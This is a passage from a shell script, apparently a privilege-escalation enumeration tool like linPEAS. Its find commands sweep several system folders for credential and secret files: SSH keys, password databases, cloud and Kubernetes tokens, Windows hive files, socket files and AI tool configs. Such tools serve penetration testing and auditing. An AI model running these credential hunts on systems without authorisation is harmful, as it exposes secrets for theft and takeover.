\"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    778   FIND_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    779   FIND_RUN=`eval_bckgrd "find ${ROOT_FOLDER}run -name \"*.timer\" -o -name \"*.socket\" -o -name \"ssh-agent.sock\" -o -name \"agent.*\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    780   FIND_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    781   FIND_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    782   FIND_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o 